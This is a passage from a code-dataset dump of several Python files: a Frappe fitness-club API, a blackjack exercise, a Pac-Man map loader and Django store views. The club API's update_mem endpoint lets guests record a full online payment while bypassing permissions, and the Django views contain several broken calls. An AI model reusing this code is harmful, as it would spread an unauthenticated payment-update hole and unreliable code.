rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': rate.rating_point,\n })\n else:\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': -1,\n })\n return details\n\n@frappe.whitelist()\ndef cancel_request(doc_id):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n frappe.db.set_value('Fitness Training Request', doc_id, {\n 'request_status': 'Cancelled',\n 'docstatus': 2\n })\n doc.reload()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Request has been cancelled\"\n }\n # else:\n # frappe.response[\"message\"] = {\n # \"status\": 0,\n # \"status_message\": \"Fitness Training Appointmnent already cancelled\"\n # }\n\n@frappe.whitelist()\ndef cancel_session(appointment_id):\n doc = cancel_appointment_online(appointment_id)\n if doc == 1:\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Appointment has been cancelled\"\n }\n else:\n frappe.response[\"message\"] = {\n \"status\": 0,\n \"status_message\": \"Fitness Training Appointment already cancelled\"\n }\n\n@frappe.whitelist()\ndef proceed_payment(client_id,doc_id, payment_method):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n # doc.payment_method= payment_method\n # doc.save()\n # cart = add_cart_from_pt_online(doc.client_id, doc.name)\n wallet= get_balance()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"document_name\": doc.name,\n \"wallet_balance\": wallet\n }\n\n@frappe.whitelist(allow_guest=True)\ndef update_mem(doc_id):\n doc = frappe.get_doc(\"Memberships Application\", doc_id)\n doc.append('membership_payment', {\n \"mode_of_payment\": \"Online Payment\",\n \"paid_amount\": doc.grand_total\n\t\t})\n doc.save(ignore_permissions=True)", "repo_name": "VivekChamp/clubcrm", "sub_path": "club_crm/api/app/fitness.py", "file_name": "fitness.py", "file_ext": "py", "file_size_in_byte": 11512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "frappe.db.get", "line_number": 12, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 14, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 18, "usage_type": "attribute"}, {"api_name": "frappe.get_list", "line_number": 24, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 26, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 37, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 44, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 50, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 10, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 57, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 58, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 61, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 78, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 55, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 84, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 85, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 87, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 90, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 82, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 113, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 113, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 113, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 116, "usage_type": "name"}, {"api_name": "frappe.get_doc", "line_number": 116, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 119, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 122, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 131, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.time.pt_cancellation_time", "line_number": 135, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 135, "usage_type": "name"}, {"api_name": "frappe.get_all", "line_number": 138, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 157, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 109, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 165, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 166, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 174, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 163, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 213, "usage_type": "call"}, {"api_name": "frappe.db.set_value", "line_number": 214, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 214, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 219, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 211, "usage_type": "call"}, {"api_name": "club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment.cancel_appointment_online", "line_number": 231, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 233, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 238, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 229, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 245, "usage_type": "call"}, {"api_name": "club_crm.api.wallet.get_balance", "line_number": 249, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 250, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 243, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 258, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 256, "usage_type": "call"}]} +{"seq_id": "31975321226", "text": "from functools import reduce\n\ndef aces_value(aces, non_aces_total):\n if len(aces) == 0:\n return 0\n missing = 21 - non_aces_total\n with_11 = 11 + len(aces)-1\n without_11 = len(aces)\n if with_11 <= missing:\n return with_11\n else:\n return without_11\n\ndef card_value(card):\n if \"Q\" == card or \"J\" == card or \"K\" == card:\n return 10\n else:\n return int(card)\n\ndef value(hand):\n count = len(hand)\n aces = filter(lambda x: x == \"A\", hand)\n non_aces = filter(lambda x: x != \"A\", hand)\n non_aces_value = map(lambda x: card_value(x), non_aces)\n non_aces_total = reduce(lambda x,y: x+y, non_aces_value, 0)\n aces_total = aces_value(list(aces), non_aces_total)\n return non_aces_total + aces_total\nprint(value([\"2\",\"2\", \"3\"]))\nprint(value([\"A\", \"A\"]))\ntwenty_one_aces = [\"A\"] * 21\nprint(value(twenty_one_aces))\n\n", "repo_name": "rafaelri/coding-challenge-solutions", "sub_path": "python/blackjack/blackjack.py", "file_name": "blackjack.py", "file_ext": "py", "file_size_in_byte": 877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "functools.reduce", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "28718791023", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Build Preliminaries of PacMan Game\"\"\"\n\nimport logging\n\n# Set logging\nlogging.basicConfig(level=logging.ERROR, filemode='w')\n\n\ndef load_map(file_pathname):\n \"\"\"Load Pac-Man Map\n\n Arguments:\n file_pathname {str} -- the file path name of a Pac-Man map\n\n Raises:\n FileNotFoundError: Provided file path name is not found\n IOError: Provided file path name can not accessible by read mode\n\n Returns:\n list -- A list of lines of Pac-Man Map\n \"\"\"\n if not isinstance(file_pathname, str):\n raise TypeError(\"Your file path must be a string\")\n try:\n # Open the file back and read the contents\n with open(file_pathname, \"r\") as map_file:\n contents = map_file.read().splitlines()\n # Check if the file or directory at `path` can be found\n except FileNotFoundError:\n raise FileNotFoundError(\"File does not exist\")\n # Check if the file or directory at `path` can be accessed by the program\n except IOError:\n raise IOError(\"File is not accessible\")\n # Returns a list of line\n return contents\n\n\ndef main():\n \"\"\"Demonstrate and run test\"\"\"\n file_pathname = './map/level1.amap'\n\n # Test wp01\n pacman_map = load_map(file_pathname)\n for line in pacman_map:\n print(line)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "kang-de-conqueror/pac_man", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 8, "usage_type": "attribute"}]} +{"seq_id": "19222687482", "text": "import random\nfrom decimal import Decimal\nfrom django.forms.models import model_to_dict\n\nfrom django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.text import slugify\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core import serializers\n\n\nfrom .models import Category, Product, ProductType, ProductSpecificationValue, Comments\nfrom .forms import AddToCartForm, AddCategoryForm, ColorSearchForm\n\nfrom apps.cart.cart import Cart\nfrom apps.vendor.forms import ProductForm, VendorRegistrationForm, VendorEditForm\nfrom apps.communication.forms import NewCommentForm\nfrom apps.vendor.models import Follow\n\n\ndef show_category(request,hierarchy= None):\n category_slug = hierarchy.split('/')\n parent = None\n root = Category.objects.all()\n for slug in category_slug[:-1]:\n parent = root.get(parent=parent, slug = slug)\n instance = Category.objects.get(parent=parent,slug=category_slug[-1])\n product = Product.objects.filter(\n category__in=Category.objects.filter(name=instance.name).get_descendants(include_self=True))\n brands = ProductType.objects.all()\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': instance\n , 'brands':brands})\n\ndef parent_child_check(request):\n if request.POST.get('mainAction') == 'post':\n id = request.POST.get('category_id')\n categories = Category.objects.filter(level=0)\n for i in categories:\n categories = Category.objects.get(id=i.id).get_descendants(include_self=True)\n response = JsonResponse({'categories': \"rr\"})\n return response\n\ndef product_all(request):\n products = Product.objects.prefetch_related(\"product_image\").filter(is_active=True)\n return render(request, \"store/product_all.html\", {\"products\": products})\n\ndef search(request):\n query = request.GET.get('query', '')\n product = Product.objects.filter(Q(title__icontains=query) | Q(description__icontains=query))\n brands = ProductType.objects.all()\n\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'color_input':ColorSearchForm})\n\ndef filter_page(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n query = query.split(',')\n discount_percent = []\n user_chose_spec = False\n \"\"\"sizes = ['S','M','L','X','XL','XXL','Red','Blue','White','Black',\n 'Brown','Green','Yellow','Purple','Orange','Cream','Lemon']\"\"\"\n for i in query:\n if i == '< 10%':\n for num in range(1,10):\n discount_percent.append(num)\n if i == '< 20%':\n for num in range(11,21):\n discount_percent.append(num)\n if i == '< 30%':\n for num in range(21,31):\n discount_percent.append(num)\n if i == '< 40%':\n for num in range(31,41):\n discount_percent.append(num)\n if i == '< 50%':\n for num in range(41,51):\n discount_percent.append(num)\n if i == '< 60%':\n for num in range(51,61):\n discount_percent.append(num)\n\n brands = ProductType.objects.all()\n\n name_list = []\n for i in query:\n instance = Category.objects.filter(slug=i)\n if instance:\n for all in instance:\n name_list.append(all.name)\n if 'has_category' in query and \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query))\n elif 'has_category' in query:\n product = Product.objects.filter(Q(category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query))\n elif \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent))\n\n if ('has_size' in query or 'has_color' in query):\n spec_list=[]\n if ('has_category' in query or \"has_brand\" in query or \"has_discount\" in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(product__in=product, value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n\n if ('has_category' not in query and \"has_brand\" not in query and \"has_discount\" not in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n product = Product.objects.filter(Q(id__in=spec_list))\n if ('has_category' in query):\n query.remove('has_category')\n if (\"has_brand\" in query):\n query.remove(\"has_brand\")\n if (\"has_discount\" in query):\n query.remove(\"has_discount\")\n if ('has_size' in query):\n query.remove('has_size')\n if ('has_color' in query):\n query.remove('has_color')\n\n return render(request, 'product/filter_page.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'user_chose_spec':user_chose_spec})\n\ndef search_brand(request):\n if request.GET.get('action') == 'get':\n brands = request.GET.get('brands')\n brands = ProductType.objects.filter(name__iexact=brands)\n\n item = {}\n if brands:\n serialized_queryset = serializers.serialize('python', brands)\n item['table'] = serialized_queryset\n\n response = JsonResponse({'item': item})\n return response\n\nfrom django import template\nregister = template.Library()\n\n\n#@register.simple_tag(takes_context=True)\n@register.filter(is_safe=True)\ndef search_single(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query))\n brands = ProductType.objects.all()\n\n response = JsonResponse({'product_search': list(product_search)})\n return response\n\ndef search_single2(request):\n if request.GET.get('action') == 'get':\n query = request.GET.get('productID')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query)).values()\n brands = ProductType.objects.all()\n product = \"\"\"\n
\n {% for i in product_search %}\n \n \"\"\"\n response = JsonResponse({'product_search': list(product)})\n return response\ndef product_detail(request, category_slugz, product_slugz):\n cart = Cart(request)\n products = get_object_or_404(Product, category__slug=category_slugz, slug=product_slugz, is_active=True)\n stores_user_follow=[]\n for i in products.vendor.vendor_follower.all():\n stores_user_follow.append(i.follower)\n\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n #------------------------------------------------------\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean=True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean=True\n if request.method == 'POST':\n comment_form = NewCommentForm(request.POST)\n if comment_form.is_valid():\n user_comment = comment_form.save(commit=False)\n user_comment.post = products\n user_comment.save()\n return HttpResponseRedirect('/' + products.slug)\n\n return redirect('product_:product_detail_', category_slug= category_slugz, product_slug=product_slugz)\n else:\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n #----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n #-------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n return render(request, 'product/product.html', {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean':wishlist_boolean,\n 'likes': str(likes), 'like_boolean':like_boolean, 'allcomments':allcomments, 'comments':comments,\n 'product_spec':product_spec, 'stores_user_follow':stores_user_follow, 'breadcrumbs': breadcrumbs})\n\n\ndef make_comment(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n name = request.POST.get('name')\n email = request.POST.get('email')\n comment = request.POST.get('comment')\n product_id = request.POST.get('product_id')\n products = Product.objects.get_object_or_404get(id=product_id)\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n # ------------------------------------------------------\n if request.user.is_authenticated:\n Comments.objects.create(made_by=request.user,\n name=request.user.firstname + \" \" + request.user.surname,\n email=request.user.email, default_image=request.user.user_image,\n made_on=products, parent=None, content=comment)\n else:\n if not request.user.is_authenticated and name != \"\" and email != \"\":\n Comments.objects.create(made_by=None, name=name, email=request.user.email,\n made_on=products, parent=None, content=comment)\n else:\n error = \"e no follo\"\n\n response = JsonResponse({'comments': error})\n return response\n\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean = True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean = True\n\n # ----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n # -------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n\n\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n return render(request, 'product/product.html',\n {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean': wishlist_boolean,\n 'likes': str(likes), 'like_boolean': like_boolean, 'allcomments': allcomments,\n 'comments': comments,\n 'product_spec': product_spec, 'breadcrumbs': breadcrumbs})\n\n\ndef product_detail2(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n qtyAction = request.POST.get('qtyAction')\n productID = int(request.POST.get('productID'))\n productQTY = int(request.POST.get('productQTY'))\n if qtyAction == 'include_item':\n product = get_object_or_404(Product, id=productID)\n cart.add(product_id=productID, product=product, quantity=productQTY, update_quantity=False)\n messages.success(request, 'The account was successfully added to the account')\n response = JsonResponse(\n {'cart_length': cart.__len__()})\n return response\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = form.cleaned_data['title']\n slug = form.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n\ndef category_list(request, category_slug):\n category = get_object_or_404(Category, slug=category_slug)\n return render(request, 'product/category.html', {'category_in_product_view': category})\n\ndef vendor_category(request):\n if request.GET.get('mainAction') == 'post':\n category_slug = request.GET.get('category_slug')\n category = get_object_or_404(Category, slug=category_slug)\n product = Product.objects.filter(\n Product, category__in=Category.objects.get(name=category_slug).get_descendants(include_self=True)\n )\n response = JsonResponse({'product': product})\n return response\n\n@login_required\ndef likes_add_and_remove(request, id):\n if request.GET.get('action') == 'get':\n product = get_object_or_404(Product, id=id)\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n product_exist = True\n action_text=' like'\n else:\n product.likes.add(request.user)\n product_exist = False\n action_text=' unlike'\n likes = product.likes.all().count()\n response = JsonResponse({'likes_no': str(likes), 'action_text':action_text, 'product_exist':product_exist})\n return response\n\n@login_required\ndef remove_from_likes(request):\n if request.GET.get('action') == 'get':\n id = request.GET.get('productID')\n product = get_object_or_404(Product, id=id)\n product_count=product.likes.add(request.user).count()\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n messages.success(request, \"you have unliked \" + product.title)\n response = JsonResponse({'product_count':product_count})\n return response\n\n@login_required\ndef add_product(request):\n vendor = request.user.which_vendor\n if request.method == \"POST\":\n form = ProductForm(request.POST, request.FILES)\n if form.is_valid():\n product = form.save(commit=False)\n\n product.vendor = vendor\n product.title = product.title\n product.category = product.category\n product.slug = slugify(product.title)\n product.description = product.description\n product.price = Decimal(product.price)\n product.in_stock = True\n product.is_active = True\n product.save()\n return redirect('vendor_:vendor_admin_')\n else:\n form=ProductForm()\n return render(request,'vendor/add_product.html', {'form':form})\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = vendor.cleaned_data['title']\n slug = vendor.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n", "repo_name": "Pycobra/NgStore2", "sub_path": "apps/product/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 19849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Category.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 32, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 33, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Product.objects.prefetch_related", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 52, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "forms.ColorSearchForm", "line_number": 56, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 86, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 86, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 95, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 96, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 99, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 101, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 102, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 104, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 106, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 106, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 108, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 110, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 116, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 137, "usage_type": "call"}, {"api_name": "models.ProductType.objects.filter", "line_number": 143, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 143, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 147, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 147, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 150, "usage_type": "call"}, {"api_name": "django.template.Library", "line_number": 154, "usage_type": "call"}, {"api_name": "django.template", "line_number": 154, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 162, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 163, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 164, "usage_type": "call"}, {"api_name": 